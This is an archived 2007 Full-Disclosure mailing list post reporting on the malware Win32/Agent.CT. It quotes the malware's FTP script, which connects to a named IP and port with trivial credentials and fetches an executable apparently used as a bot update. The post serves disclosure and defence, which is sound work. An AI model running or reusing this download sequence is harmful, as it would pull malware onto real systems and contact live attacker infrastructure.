[<prev] [next>] [day] [month] [year] [list]
Message-ID: <01f601c73508$e624f260$c801a8c0@Nemo>
Date: Thu, 11 Jan 2007 09:44:31 +1100
From: "FocusVirus" <virus@...j.com>
To: "Full-disclosure" <full-disclosure@...ts.grok.org.uk>,
<focus-virus@...urityfocus.com>
Subject: Script from Win32/Agent.CT
I attempted to download this but was dropped by the FTP server.
Host 61.36.242.10 is listening on port 5444 and appears to be hosting bot
update files.
Headers - 220 Serv-U FTP Server v5.0 for WinSock ready...
Script for filedownload is
> open 61.36.242.10 5444
> user 1 1
> get kage . exe <----
> quit
Was locked out on my first attempt, password was incorrect. Lock down your
connections now! :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists